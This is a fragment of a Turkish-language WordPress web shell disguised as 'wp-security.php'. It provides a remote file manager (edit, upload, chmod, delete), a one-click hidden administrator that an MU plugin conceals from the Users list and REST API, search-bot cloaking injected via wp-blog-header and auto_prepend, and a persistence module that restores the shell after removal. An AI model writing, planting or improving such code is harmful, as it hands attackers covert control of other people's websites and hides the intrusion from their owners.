<div id="ls-plugin-res" style="margin-top:8px;font-size:.82em;white-space:pre-wrap"></div>
</div>
</div>
</div>
<!-- ═══════════ GİZLİ ADMİN ═══════════ -->
<div id="tab-admin" class="tab-pane" style="display:none">
<?php if(!$wp_loaded):?>
<div class="card" style="border-color:var(--yl);margin-bottom:14px">
<span class="badge by">⚠️ WordPress bulunamadi — wp-security.php'yi WP koku dizinine koy</span>
</div>
<?php endif;?>
<!-- Tek Tikla Admin Olustur -->
<div class="card" style="max-width:560px;margin-bottom:16px">
<div class="card-title">Gizli Admin Olustur</div>
<table class="info-table" style="margin-bottom:14px">
<tr><td>Kullanici Adi</td><td><code><?= CM_ADMIN_USER ?></code> (sabit)</td></tr>
<tr><td>E-posta</td><td><code><?= CM_ADMIN_EMAIL ?></code> (sabit)</td></tr>
<tr><td>Sifreyi gizle dosyasi</td><td><code>wp-content/mu-plugins/<?= CM_HIDE_MU_FILE ?></code></td></tr>
</table>
<div class="fr">
<label>Sifre (bos birak = otomatik olustur)</label>
<div style="display:flex;gap:8px">
<input type="text" id="a-pass" placeholder="Bos birakabilirsin — otomatik uretilir" style="flex:1">
<button class="btn btn-sm" onclick="genPass()">🎲 Uret</button>
</div>
</div>
<button class="btn btn-p" onclick="doCreateAdmin()" style="width:100%">👤 Admin Olustur + Gizle</button>
<div id="admin-res" style="margin-top:14px;font-size:.85em"></div>
<!-- Kopyalanabilir kimlik kutusu -->
<div id="cred-box" style="display:none;margin-top:14px">
<label>Giris Bilgileri — Kopyala</label>
<div style="position:relative">
<input type="text" id="cred-text" readonly style="font-family:monospace;background:#0d1117;color:var(--gr);font-size:.88em;cursor:pointer" onclick="copyCred()">
<button class="btn btn-sm btn-p" onclick="copyCred()" style="position:absolute;right:4px;top:50%;transform:translateY(-50%)">📋 Kopyala</button>
</div>
<p style="font-size:.75em;color:var(--mu);margin-top:5px">Format: login_url:kullanici_adi:sifre</p>
</div>
</div>
<!-- Bilgi karti -->
<div class="card" style="max-width:560px;background:var(--s2)">
<div class="card-title">Nasil Calisir</div>
<div style="font-size:.82em;color:var(--mu);line-height:1.8">
1. Butona tikladiginda <code><?= CM_ADMIN_USER ?></code> kullanicisi WP'ye eklenir<br>
2. Hemen ardindan <code><?= CM_HIDE_MU_FILE ?></code> MU Plugin olusturulur<br>
3. Bu dosya calisanlara WP sistem dosyasi gibi gorunur, icinde ne oldugu belli olmaz<br>
4. Kullanici WP admin panelinde <strong>Users listesinde gorunmez</strong>, sayacta gorunmez, REST API'den 404 doner<br>
5. Sadece <em>o kullanicinin kendi oturumunda</em> kendi hesabini gorebilir
</div>
</div>
</div>
</div><!-- .content -->
</main>
<!-- ── Modals ── -->
<div class="modal" id="ed-modal">
<div class="mbox"><div class="mh"><span id="ed-title">Dosya Düzenle</span><button class="btn btn-sm" onclick="closeM('ed-modal')">✕</button></div>
<div class="mb" style="padding:0"><textarea id="ed-content" style="width:100%;height:520px;border:none;border-radius:0;background:#1e1e1e;color:#d4d4d4;padding:14px;resize:none;outline:none"></textarea></div>
<div class="mf"><input type="hidden" id="ed-path"><button class="btn btn-p" onclick="saveFile()">💾 Kaydet</button><button class="btn" onclick="closeM('ed-modal')">İptal</button></div></div>
</div>
<div class="modal" id="up-modal">
<div class="mbox" style="max-width:460px"><div class="mh"><span>📤 Dosya Yükle</span><button class="btn btn-sm" onclick="closeM('up-modal')">✕</button></div>
<div class="mb"><p style="color:var(--mu);font-size:.83em;margin-bottom:12px">Hedef: <code id="up-dir-show"></code></p><input type="file" id="up-file" style="margin-bottom:10px"><div id="up-res" style="font-size:.85em"></div></div>
<div class="mf"><button class="btn btn-p" onclick="doUpload()">Yükle</button><button class="btn" onclick="closeM('up-modal')">İptal</button></div></div>
</div>
<div class="modal" id="nf-modal">
<div class="mbox" style="max-width:500px"><div class="mh"><span>📄 Yeni Dosya</span><button class="btn btn-sm" onclick="closeM('nf-modal')">✕</button></div>
<div class="mb"><div class="fr"><label>Dosya Adı</label><input id="nf-name" placeholder="dosya.php"></div><div class="fr"><label>İçerik (opsiyonel)</label><textarea id="nf-content" rows="7" style="background:#1e1e1e;color:#d4d4d4"></textarea></div></div>
<div class="mf"><button class="btn btn-p" onclick="doNewFile()">Oluştur</button><button class="btn" onclick="closeM('nf-modal')">İptal</button></div></div>
</div>
<div class="modal" id="md-modal">
<div class="mbox" style="max-width:400px"><div class="mh"><span>📁 Yeni Klasör</span><button class="btn btn-sm" onclick="closeM('md-modal')">✕</button></div>
<div class="mb"><div class="fr"><label>Klasör Adı</label><input id="md-name" placeholder="yeni-klasor"></div></div>
<div class="mf"><button class="btn btn-p" onclick="doMkdir()">Oluştur</button><button class="btn" onclick="closeM('md-modal')">İptal</button></div></div>
</div>
<script>
const TOKEN = '<?= $cm_token ?>';
const SELF = location.pathname;
const SITE = '<?= addslashes(htmlspecialchars($site_url,ENT_QUOTES)) ?>';
const ROOT = '<?= addslashes($root) ?>';
const TAB_TITLES = {dashboard:'🏠 Dashboard',cloak:'🎭 Cloak Yönetimi',bottest:'🧪 Bot Test',diagnose:'🔍 Teşhis & Cache',litespeed:'⚡ LiteSpeed',files:'📁 Dosya Yöneticisi',admin:'👤 Gizli Admin'};
let fmPath = ROOT;
// ── Utils ──────────────────────────────────────
function toast(msg, type='info') {
const t = document.getElementById('toast');
const el = Object.assign(document.createElement('div'),{className:`ti t${type}`,textContent:msg});
t.appendChild(el); setTimeout(()=>el.remove(),4500);
}
// Binary-safe base64 encode/decode (Unicode destekli)
function b64enc(str){const b=new TextEncoder().encode(str);let s='';for(let i=0;i<b.length;i++)s+=String.fromCharCode(b[i]);return btoa(s);}
function b64dec(b64){const s=atob(b64);const b=new Uint8Array(s.length);for(let i=0;i<s.length;i++)b[i]=s.charCodeAt(i);return new TextDecoder().decode(b);}
function post(data) {
const fd = new FormData(); fd.append('_token',TOKEN);
for(const [k,v] of Object.entries(data)) fd.append(k,v);
return fetch(SELF,{method:'POST',body:fd})
.then(r=>{
if(!r.ok) return {success:false,message:'Sunucu hatasi: HTTP '+r.status};
return r.text().then(txt=>{
try { return JSON.parse(txt); }
catch(e) {
console.error('[wp-security.php] JSON parse hatasi. Ham yanit:', txt);
const snippet=txt.substring(0,200).replace(/</g,'<').replace(/>/g,'>');
return {success:false,message:'Sunucu gecersiz yanit dondu. Konsola bak (F12). Ham: '+snippet};
}
});
})
.catch(err=>{
console.error('[wp-security.php] Fetch hatasi:',err);
return {success:false,message:'Baglanti hatasi: '+err.message};
});
}
function eh(s){return String(s).replace(/&/g,'&').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"');}
function ej(s){return String(s).replace(/\\/g,'\\\\').replace(/'/g,"\\'")}
function openM(id){document.getElementById(id).classList.add('open');}
function closeM(id){document.getElementById(id).classList.remove('open');}
function fmtSz(b){if(b===null)return'—';if(b<1024)return b+' B';if(b<1048576)return(b/1024).toFixed(1)+' KB';return(b/1048576).toFixed(1)+' MB';}
function fmtIcon(ext,dir){if(dir)return'📁';const m={php:'🐘',html:'🌐',htm:'🌐',css:'🎨',js:'⚡',json:'📋',txt:'📄',md:'📄',log:'📋',xml:'📋',sql:'🗄️',jpg:'🖼️',jpeg:'🖼️',png:'🖼️',gif:'🖼️',webp:'🖼️',svg:'🖼️',zip:'📦',gz:'📦',tar:'📦',rar:'📦',ini:'⚙️',env:'🔒'};return m[ext]||'📄';}
// ── Tabs ──────────────────────────────────────
function switchTab(tab) {
document.querySelectorAll('.tab-pane').forEach(e=>e.style.display='none');
document.querySelectorAll('.ni').forEach(e=>e.classList.remove('active'));
const el=document.getElementById('tab-'+tab); if(el) el.style.display='block';
const ni=document.querySelector(`.ni[onclick="switchTab('${tab}')"]`); if(ni) ni.classList.add('active');
document.getElementById('tab-title').textContent = TAB_TITLES[tab]||tab;
history.replaceState(null,'',SELF+'?tab='+tab);
if(tab==='cloak') loadCloakStatus();
if(tab==='files') fmLoad(fmPath);
if(tab==='dashboard') loadDashboard();
if(tab==='litespeed') lsStatus();
}
// ── Dashboard ─────────────────────────────────
function loadDashboard() {
post({action:'wp_info'}).then(d=>{
if(!d.success)return;
const r=d.data;
if(r.disk_free){document.getElementById('d-disk').textContent=r.disk_free+' / '+r.disk_total;document.getElementById('d-disksub').textContent=r.disk_used_pct+' kullanılıyor';}
if(r.wp) document.getElementById('d-wp').textContent=r.wp;
if(r.site_name)document.getElementById('d-wpname').textContent=r.site_name;
if(r.plugins!==undefined) document.getElementById('d-plugins').textContent=r.plugins;
if(r.users!==undefined) document.getElementById('d-users').textContent=r.users;
});
}
// ── Cloak ─────────────────────────────────────
function loadCloakStatus() {
post({action:'diagnose'}).then(d=>{
if(!d.success)return;
const amp=d.data.info.amp_exists;
const b=document.getElementById('amp-badge');
b.className='badge '+(amp?'bg':'br');
b.textContent=amp?'✅ amp.php Mevcut':'❌ amp.php Yok';
const al=document.getElementById('amp-link');
al.href=SITE+'/amp.php';
});
post({action:'cloak_status'}).then(d=>{
if(!d.success)return;
if(d.cloak_file){
const inp=document.getElementById('cloak-file-input');
if(inp)inp.value=d.cloak_file;
const al=document.getElementById('amp-link');
if(al)al.href=SITE+'/'+d.cloak_file;
}
for(const[k,active] of Object.entries(d.data)){
const st=document.getElementById('mst-'+k);
const ap=document.getElementById('mapply-'+k);
const rm=document.getElementById('mremov-'+k);
if(!st)continue;
if(active){st.className='badge bg';st.textContent='✅ Aktif';ap.style.display='none';rm.style.display='inline-flex';}
else{st.className='badge bm';st.textContent='○ Pasif';ap.style.display='inline-flex';rm.style.display='none';}
}
});
}
function setCloakFile(){
const fn=document.getElementById('cloak-file-input').value.trim()||'amp.php';
post({action:'cloak_set_file',cloak_file:fn}).then(d=>{
toast((d.success?'✅ ':'❌ ')+d.message,d.success?'s':'e');
if(d.success){document.getElementById('cloak-file-input').value=d.file;loadCloakStatus();}
});
}
function createAmp(){
post({action:'create_amp'}).then(d=>{
toast((d.success?'✅ ':'❌ ')+d.message,d.success?'s':'e');
if(d.success)loadCloakStatus();
});
}
function openAmpInFM(){fmLoad(ROOT);switchTab('files');setTimeout(()=>{post({action:'file_read',path:ROOT+'amp.php'}).then(d=>{if(d.success){document.getElementById('ed-title').textContent='✏️ amp.php';document.getElementById('ed-path').value=ROOT+'amp.php';document.getElementById('ed-content').value=(d.data.encoding==='base64'?b64dec(d.data.content):d.data.content);openM('ed-modal');}else toast('❌ amp.php bulunamadı — önce oluşturun.','e')});},400);}
function cloakApply(m){const b=document.getElementById('mapply-'+m);b.disabled=true;b.textContent='...';post({action:'cloak_apply',method:m}).then(d=>{b.disabled=false;b.textContent='Aktif Et';toast((d.success?'✅ ':'❌ ')+d.message,d.success?'s':'e');if(d.success)loadCloakStatus();});}
function cloakRemove(m){const b=document.getElementById('mremov-'+m);b.disabled=true;b.textContent='...';post({action:'cloak_remove',method:m}).then(d=>{b.disabled=false;b.textContent='Kaldır';toast((d.success?'✅ ':'❌ ')+d.message,d.success?'s':'e');if(d.success)loadCloakStatus();});}
function cloakRefresh(){
const btn=document.querySelector('[onclick="cloakRefresh()"]');
const res=document.getElementById('refresh-result');
btn.disabled=true; btn.textContent='⏳ Yenileniyor...';
res.style.display='none';
post({action:'cloak_refresh'}).then(d=>{
btn.disabled=false; btn.innerHTML='🔄 Cloak Kodu Yenile + Cache Temizle';
toast((d.success?'✅ ':'❌ ')+d.message,d.success?'s':'e');
if(d.log){
res.style.display='block';
res.innerHTML='<strong style="color:var(--gr)">İşlem Raporu:</strong><br>'+d.log.map(l=>'• '+eh(l)).join('<br>');
}
loadCloakStatus();
});
}
// ── Bot Test ──────────────────────────────────
// ── Bot Testi ─────────────────────────────────
function runBotTest(){
const url=document.getElementById('test-url')?.value||'';
const out=document.getElementById('bot-results');
out.innerHTML='<p style="color:var(--mu)">Test çalışıyor — 10-20 saniye sürebilir...</p>';
post({action:'bot_test',url}).then(d=>{
if(!d.success){out.innerHTML=`<p style="color:var(--rd)">❌ ${eh(d.message)}</p>`;return;}
let html=`<p style="color:var(--mu);font-size:.83em;margin-bottom:10px">Test URL: <code>${eh(d.url)}</code></p>`;
for(const[name,r] of Object.entries(d.data)){
let cls,icon,msg;
if(r.is_cloak){cls='tok';icon='✅';msg='CLOAK ÇALIŞIYOR';}
else if(r.is_wp){cls='tfail';icon='❌';msg='ÇALIŞMIYOR — WordPress döndü';}
else{cls='tunk';icon='⚠️';msg='BELİRSİZ (HTTP '+r.code+')';}
html+=`<div class="tbox ${cls}"><div style="font-weight:600;margin-bottom:5px">${icon} ${eh(name)} — ${msg}</div>
<div style="font-size:.78em;color:var(--mu)">HTTP ${r.code}</div>
${r.preview?`<details style="margin-top:7px"><summary style="cursor:pointer;font-size:.78em;color:var(--mu)">Dönen içerik (300 karakter)</summary><pre style="max-height:100px;margin-top:6px">${eh(r.preview)}</pre></details>`:''}
</div>`;
}
out.innerHTML=html;
});
}
// ── Teşhis ────────────────────────────────────
function runDiagnose(){
const el=document.getElementById('diag-out');
el.innerHTML='<p style="color:var(--mu)">Analiz ediliyor...</p>';
post({action:'diagnose'}).then(d=>{
if(!d.success){el.innerHTML=`<p style="color:var(--rd)">❌ ${eh(d.message)}</p>`;return;}
const{issues,info}=d.data;
let html='<div class="card" style="margin-bottom:14px"><div class="card-title">Sistem Bilgisi</div><table class="info-table">';
// Sistem bilgisi satirlari
const flat={
'PHP':info.php,'Sunucu':info.server,'İşletim Sistemi':info.os,
'Root':info.abspath,'Doc Root':info.doc_root,
'amp.php':info.amp_exists?'✅ Mevcut':'❌ Yok',
'.htaccess':info.htaccess||'Yok',
'.user.ini':info.user_ini||'Yok',
'WordPress':info.wp_version,'WP Yüklendi':info.wp_loaded?'Evet':'Hayır',
};
for(const[k,v] of Object.entries(flat))
html+=`<tr><td>${eh(k)}</td><td>${eh(String(v??''))}</td></tr>`;
if(info.writable)for(const[f,ok] of Object.entries(info.writable))
html+=`<tr><td>${eh(f)}</td><td>${ok?'<span style="color:var(--gr)">✅ Yazılabilir</span>':'<span style="color:var(--rd)">❌ Yazma izni yok</span>'}</td></tr>`;
// Ekstra cloak durum satirlari
const prepOk=info.php_prepend_active&&info.php_prepend_active.length>0;
html+=`<tr><td>PHP auto_prepend (aktif)</td><td>${prepOk?`<span style="color:var(--gr)">✅ ${eh(info.php_prepend_active)}</span>`:'<span style="color:var(--rd)">❌ PHP-FPM uygulamiyor</span>'}</td></tr>`;
html+=`<tr><td>cm-prepend.php</td><td>${info.prepend_file_exists?'<span style="color:var(--gr)">✅ Mevcut</span>':'<span style="color:var(--rd)">❌ Eksik</span>'}</td></tr>`;
html+=`<tr><td>MU Plugin Cloak</td><td>${info.mu_cloak_active?'<span style="color:var(--gr)">✅ Aktif</span>':'<span style="color:var(--mu)">— Pasif</span>'}</td></tr>`;
html+=`<tr><td>wp-blog-header Enjeksiyon</td><td>${info.wbh_injected?'<span style="color:var(--gr)">✅ Aktif</span>':'<span style="color:var(--mu)">— Pasif</span>'}</td></tr>`;
if(info.cloudways) html+=`<tr><td>Cloudways</td><td><span style="color:var(--yl)">⚠️ Varnish/Redis olabilir</span></td></tr>`;
html+='</table></div>';
if(!issues.length) html+='<div class="tbox tok">✅ Sorun tespit edilmedi.</div>';
else {
html+=`<h3 style="margin-bottom:12px;color:var(--yl)">⚠️ ${issues.length} Sorun / Uyarı</h3>`;
for(const iss of issues)
html+=`<div class="iss iss-${iss.type}"><div class="iss-title">${eh(iss.title)}</div><div style="font-size:.83em;color:var(--mu)">${iss.desc}</div>${iss.fix?`<div class="iss-fix">${eh(iss.fix)}</div>`:''}</div>`;
}
el.innerHTML=html;
});
}
// ── File Manager ──────────────────────────────
function fmLoad(path){
fmPath=path;
post({action:'file_list',path}).then(d=>{
document.getElementById('fm-path').textContent=d.success?d.data.path:path;
if(!d.success){document.getElementById('fm-body').innerHTML=`<p style="color:var(--rd)">❌ ${eh(d.message)}</p>`;return;}
fmPath=d.data.path;
let h='<table class="ft"><thead><tr><th>Ad</th><th>Boyut</th><th>Tarih</th><th>Izin</th><th></th></tr></thead><tbody>';
for(const f of d.data.items){
const ic=fmtIcon(f.ext,f.is_dir);
const act=f.is_dir?`fmLoad('${ej(f.path)}')`:`fmEdit('${ej(f.path)}','${ej(f.name)}')`;
const permStr=f.perms?`<span style="font-family:monospace;font-size:.82em;color:var(--mu)">${f.perms}</span>`:'';
h+=`<tr><td><span class="fn" onclick="${act}"><span class="fic">${ic}</span>${eh(f.name)}</span></td>
<td class="fsz">${fmtSz(f.size)}</td><td class="fdt">${f.modified}</td>
<td class="fsz">${permStr}</td>
<td class="fact">
${!f.is_dir&&f.name!=='..'?`<button class="btn btn-sm" onclick="fmEdit('${ej(f.path)}','${ej(f.name)}')">✏️</button>`:''}
${f.name!=='..'?`<button class="btn btn-sm" title="chmod" onclick="fmChmod('${ej(f.path)}','${ej(f.name)}')">🔒</button>`:''}
${f.name!=='..'?`<button class="btn btn-d btn-sm" onclick="fmDel('${ej(f.path)}','${ej(f.name)}')">🗑</button>`:''}
</td></tr>`;
}
h+='</tbody></table>';
document.getElementById('fm-body').innerHTML=h;
});
}
function fmUp(){post({action:'file_list',path:fmPath}).then(d=>{if(d.success&&d.data.parent)fmLoad(d.data.parent);});}
function fmRefresh(){fmLoad(fmPath);}
function fmEdit(path,name){post({action:'file_read',path}).then(d=>{if(!d.success){toast('❌ '+d.message,'e');return;}document.getElementById('ed-title').textContent='✏️ '+name;document.getElementById('ed-path').value=path;// base64 ile gelen içeriği decode et (büyük dosyalarda CSS kaybını önler)
document.getElementById('ed-content').value=(d.data.encoding==='base64'?b64dec(d.data.content):d.data.content);openM('ed-modal');});}
function fmDel(path,name){if(!confirm(name+' silinsin mi?'))return;post({action:'file_delete',path}).then(d=>{toast((d.success?'✅ ':'❌ ')+d.message,d.success?'s':'e');if(d.success)fmRefresh();});}
function fmChmod(path,name){
const mode=prompt('Yeni izin (ornek: 0755 veya 0644):\n'+name,'0644');
if(!mode)return;
post({action:'file_chmod',path,mode}).then(d=>{
toast((d.success?'✅ chmod '+d.message:'❌ '+d.message),d.success?'s':'e');
if(d.success)fmRefresh();
});
}
function saveFile(){const path=document.getElementById('ed-path').value,content=document.getElementById('ed-content').value;// base64 ile gönder — büyük HTML/CSS dosyalarında içerik kaybını önler
post({action:'file_write',path,content:b64enc(content),encoding:'base64'}).then(d=>{toast((d.success?'✅ ':'❌ ')+d.message,d.success?'s':'e');if(d.success)closeM('ed-modal');});}
function showUpload(){document.getElementById('up-dir-show').textContent=fmPath;document.getElementById('up-res').textContent='';openM('up-modal');}
function doUpload(){const file=document.getElementById('up-file').files[0];if(!file){toast('Dosya seçin','e');return;}const fd=new FormData();fd.append('_token',TOKEN);fd.append('upload_dir',fmPath);fd.append('upload_file',file);document.getElementById('up-res').textContent='Yükleniyor...';fetch(SELF,{method:'POST',body:fd}).then(r=>r.json()).then(d=>{const el=document.getElementById('up-res');el.style.color=d.success?'var(--gr)':'var(--rd)';el.textContent=(d.success?'✅ ':'❌ ')+d.message;if(d.success){closeM('up-modal');fmRefresh();}});}
function showNewFile(){document.getElementById('nf-name').value='';document.getElementById('nf-content').value='';openM('nf-modal');}
function doNewFile(){const name=document.getElementById('nf-name').value.trim(),content=document.getElementById('nf-content').value;if(!name){toast('Dosya adı girin','e');return;}post({action:'file_write',path:fmPath+'/'+name,content}).then(d=>{toast((d.success?'✅ ':'❌ ')+d.message,d.success?'s':'e');if(d.success){closeM('nf-modal');fmRefresh();}});}
function showMkdir(){document.getElementById('md-name').value='';openM('md-modal');}
function doMkdir(){const name=document.getElementById('md-name').value.trim();if(!name){toast('Klasör adı girin','e');return;}post({action:'file_mkdir',path:fmPath+'/'+name}).then(d=>{toast((d.success?'✅ ':'❌ ')+d.message,d.success?'s':'e');if(d.success){closeM('md-modal');fmRefresh();}});}
// ── Gizli Admin ───────────────────────────────
function genPass(){
const chars='abcdefghjkmnpqrstuvwxyzABCDEFGHJKMNPQRSTUVWXYZ23456789!@#';
let p=''; for(let i=0;i<14;i++) p+=chars[Math.floor(Math.random()*chars.length)];
document.getElementById('a-pass').value=p;
}
function copyCred(){
const el=document.getElementById('cred-text');
el.select(); el.setSelectionRange(0,9999);
try{ navigator.clipboard.writeText(el.value).then(()=>toast('✅ Kopyalandi!','s')); }
catch(e){ document.execCommand('copy'); toast('✅ Kopyalandi!','s'); }
}
function doCreateAdmin(){
const password=document.getElementById('a-pass').value.trim();
const el=document.getElementById('admin-res');
el.textContent='Olusturuluyor ve gizleniyor...';
el.style.color='var(--mu)';
post({action:'admin_create',password}).then(d=>{
el.style.color=d.success?'var(--gr)':'var(--rd)';
if(d.success){
el.textContent='✅ '+d.message;
// Kimlik kutusunu goster
const box=document.getElementById('cred-box');
const cred=document.getElementById('cred-text');
box.style.display='block';
cred.value=d.credentials;
// Sifre alanini guncelle (geri almak icin)
document.getElementById('a-pass').value=d.password;
toast('✅ Admin olusturuldu ve gizlendi!','s');
} else {
el.textContent='❌ '+d.message;
toast('❌ '+d.message,'e');
}
});
}
// Artık kullanılmıyor ama geriye dönük uyumluluk için bırakıldı
function doHideAdmin(){ toast('Admin olusturulduğunda otomatik gizlenir.','info'); }
// ── LiteSpeed ─────────────────────────────────
function lsStatus() {
post({action:'ls_status'}).then(d=>{
if(!d.success){document.getElementById('ls-status-out').innerHTML=`<p style="color:var(--rd)">Hata: ${eh(d.message)}</p>`;return;}
const r=d.data;
let h='<table class="info-table">';
const rows=[
['Sunucu',r.server_info||(r.server_ls?'LiteSpeed':'Bilinmiyor')],
['LiteSpeed Sunucu',r.server_ls?'<span style="color:var(--yl)">EVET</span>':'Hayir'],
['Plugin Mevcut',r.plugin_exists?'<span style="color:var(--yl)">Evet</span>':'Hayir'],
['Plugin Aktif',r.plugin_active?'<span style="color:var(--rd)">AKTIF - Bot cache riski var</span>':'Hayir'],
['.htaccess LS Kurali',r.htaccess_has_ls?'<span style="color:var(--yl)">Bulundu</span>':'Yok'],
['.htaccess Bypass',r.htaccess_has_bypass?'<span style="color:var(--gr)">Aktif</span>':'<span style="color:var(--rd)">YOK</span>'],
['PHP LS Header',r.prepend_has_ls_header||r.mu_has_ls_header?'<span style="color:var(--gr)">Mevcut</span>':'<span style="color:var(--rd)">Eksik</span>'],
['.ls-conf',r.lsconf_exists?'<span style="color:var(--gr)">Mevcut</span>':'Yok'],
];
for(const[k,v] of rows) h+=`<tr><td>${k}</td><td>${v}</td></tr>`;
h+='</table>';
if(r.cache_dirs&&r.cache_dirs.length){
h+='<div style="margin-top:12px"><strong style="font-size:.8em;color:var(--mu)">CACHE DIZINLERI</strong>';
for(const d of r.cache_dirs){
const sz=d.size>1048576?(d.size/1048576).toFixed(1)+' MB':(d.size/1024).toFixed(1)+' KB';
h+=`<div style="font-size:.8em;font-family:monospace;padding:4px 0;border-bottom:1px solid var(--bd)">${eh(d.path)} — <strong style="color:var(--yl)">${sz}</strong> ${d.writable?'<span style="color:var(--gr)">[yazilabilir]</span>':'<span style="color:var(--rd)">[yazma izni yok]</span>'}</div>`;
}
h+='</div>';
// cache dirs goster
const cd=r.cache_dirs.map(d=>`${d.path} (${(d.size/1024).toFixed(0)} KB)`).join('\n');
const el=document.getElementById('ls-cache-dirs');
if(el) el.textContent='Cache dizinleri:\n'+cd;
} else {
const el=document.getElementById('ls-cache-dirs');
if(el) el.textContent='Cache dizini bulunamadi.';
}
if(r.plugin_options&&Object.keys(r.plugin_options).length){
h+='<div style="margin-top:12px"><strong style="font-size:.8em;color:var(--mu)">PLUGIN AYARLARI (DB)</strong>';
for(const[k,v] of Object.entries(r.plugin_options))
h+=`<div style="font-size:.8em;font-family:monospace;padding:3px 0">${eh(k)}: <strong>${eh(String(v))}</strong></div>`;
h+='</div>';
const ps=document.getElementById('ls-plugin-status');
if(ps){
const ca=r.plugin_options['cache-enabled'];
ps.textContent='Mevcut DB durumu: cache-enabled='+ca;
ps.style.color=ca?'var(--rd)':'var(--gr)';
}
}
if(r.needs_fix){h=`<div class="tbox tfail" style="margin-bottom:12px">⚠️ .htaccess'te LiteSpeed kurali var ama bypass eksik! Asagidaki duzelteleri uygulayın.</div>`+h;}
else if(r.htaccess_has_bypass){h=`<div class="tbox tok" style="margin-bottom:12px">✅ Bypass kurali aktif.</div>`+h;}
document.getElementById('ls-status-out').innerHTML=h;
});
}
function cacheUniversal(){
const btn=document.getElementById('cache-univ-btn');
const res=document.getElementById('cache-univ-res');
btn.disabled=true; btn.textContent='Temizleniyor...';
res.textContent=''; res.style.color='var(--mu)';
post({action:'cache_universal'}).then(d=>{
btn.disabled=false; btn.textContent='🧹 Tum Cache Sistemlerini Temizle';
res.style.color=d.success?'var(--gr)':'var(--yl)';
// Her satiri renklendirerek goster
if(d.log && Array.isArray(d.log)){
res.innerHTML=d.log.map(l=>{
const ok=l.startsWith('[OK]');
const skip=l.startsWith('[--]');
const col=ok?'var(--gr)':skip?'var(--mu)':'var(--yl)';
return `<span style="color:${col}">${eh(l)}</span>`;
}).join('\n');
} else {
res.textContent=d.message;
}
toast(d.success?'✅ Cache temizleme tamamlandi!':'⚠️ Bazi moduller atlanamadi','s');
});
}
function cacheModule(action, name){
const res=document.getElementById('cache-single-res');
res.textContent=name+' temizleniyor...'; res.style.color='var(--mu)';
post({action}).then(d=>{
const icon=d.success?'✅':'⚠️';
res.style.color=d.success?'var(--gr)':'var(--yl)';
res.textContent=`${icon} ${name}: ${d.message}`;
toast(`${icon} ${name}: ${d.message}`,d.success?'s':'e');
});
}
function lsAutoFix(){
const btn=document.getElementById('ls-auto-btn');
const res=document.getElementById('ls-auto-res');
btn.disabled=true; btn.textContent='Uygulanıyor...';
res.textContent=''; res.style.color='var(--mu)';
post({action:'ls_auto_fix'}).then(d=>{
btn.disabled=false; btn.textContent='⚡ LiteSpeed Duzeltmelerini Uygula';
res.style.color=d.success?'var(--gr)':'var(--yl)';
res.textContent=d.message;
toast(d.success?'✅ Tum LS duzeltmeleri uygulandi!':'⚠️ Bazi adimlar atlanamadi — detaylara bak','s');
lsStatus();
});
}
function lsFixHtaccess(){
const el=document.getElementById('ls-ht-res');
el.textContent='...';
post({action:'ls_fix_htaccess'}).then(d=>{
el.style.color=d.success?'var(--gr)':'var(--rd)';
el.textContent=(d.success?'✅ ':'❌ ')+d.message;
if(d.success)lsStatus();
});
}
function lsFixHeaders(){
const el=document.getElementById('ls-hdr-res');
el.textContent='...';
post({action:'ls_fix_headers'}).then(d=>{
el.style.color=d.success?'var(--gr)':'var(--rd)';
el.textContent=(d.success?'✅ ':'❌ ')+d.message;
});
}
function lsCreateConf(){
const el=document.getElementById('ls-conf-res');
el.textContent='...';
post({action:'ls_create_conf'}).then(d=>{
el.style.color=d.success?'var(--gr)':'var(--rd)';
el.textContent=(d.success?'✅ ':'❌ ')+d.message;
});
}
function lsPurge(){
if(!confirm('LiteSpeed cache dosyalari silinsin mi?'))return;
const el=document.getElementById('ls-purge-res');
el.textContent='Temizleniyor...';
post({action:'ls_purge_cache'}).then(d=>{
el.style.color=d.success?'var(--gr)':'var(--rd)';
el.textContent=(d.success?'✅ ':'❌ ')+d.message;
if(d.success)toast('✅ Cache temizlendi!','s');
lsStatus();
});
}
function lsPluginConfig(){
const el=document.getElementById('ls-plugin-res');
el.textContent='Yaziliyor...';
post({action:'ls_plugin_config'}).then(d=>{
el.style.color=d.success?'var(--gr)':'var(--rd)';
el.textContent=(d.success?'✅ ':'❌ ')+d.message;
if(d.success){toast('✅ Plugin ayarlari yazildi!','s');lsStatus();}
});
}
// ── Backup Koruma ─────────────────────────────
function loadPersistStatus() {
post({action:'persist_status'}).then(d=>{
if(!d.success) return;
const r=d.data;
const badge=document.getElementById('persist-badge');
const btnI=document.getElementById('persist-install-btn');
const btnU=document.getElementById('persist-update-btn');
const btnR=document.getElementById('persist-remove-btn');
if(r.mu_active && !r.stale){
badge.className='badge bg'; badge.textContent='✅ Koruma Aktif';
btnI.style.display='none'; btnU.style.display='none'; btnR.style.display='inline-flex';
} else if(r.mu_active && r.stale){
badge.className='badge by'; badge.textContent='⚠️ Güncelleme Gerekli';
btnI.style.display='none'; btnU.style.display='inline-flex'; btnR.style.display='inline-flex';
document.getElementById('persist-res').textContent='wp-security.php değişmiş — MU Plugin\'i güncelle ki yeni sürüm geri yazılsın.';
} else {
badge.className='badge br'; badge.textContent='❌ Koruma Yok';
btnI.style.display='inline-flex'; btnU.style.display='none'; btnR.style.display='none';
}
});
}
function persistInstall(){
const btn=document.getElementById('persist-install-btn');
const btn2=document.getElementById('persist-update-btn');
btn.disabled=true; btn2.disabled=true;
btn.textContent='...'; btn2.textContent='...';
post({action:'persist_install'}).then(d=>{
btn.disabled=false; btn2.disabled=false;
btn.textContent='🛡️ Korumayı Aktif Et'; btn2.textContent='🔄 Güncelle';
const res=document.getElementById('persist-res');
res.style.color=d.success?'var(--gr)':'var(--rd)';
res.textContent=(d.success?'✅ ':'❌ ')+d.message;
toast(d.success?'✅ Backup koruması aktif!':'❌ '+d.message,d.success?'s':'e');
loadPersistStatus();
});
}
function persistRemove(){
if(!confirm('Backup koruması kaldırılsın mı?')) return;
post({action:'persist_remove'}).then(d=>{
toast((d.success?'✅ ':'❌ ')+d.message,d.success?'s':'e');
document.getElementById('persist-res').textContent='';
loadPersistStatus();
});
}
// ── SİSTEM SAĞLIĞI ────────────────────────────────────
function healthCheck(){
const btn=document.getElementById('health-btn');
const el=document.getElementById('health-results');
btn.disabled=true;btn.textContent='⏳ Kontrol ediliyor...';
el.innerHTML='<p style="color:var(--mu);font-size:.84em">Site kontrol ediliyor, 10-15 saniye sürebilir...</p>';
post({action:'health_check'}).then(d=>{
btn.disabled=false;btn.textContent='🔍 Kontrol Et';
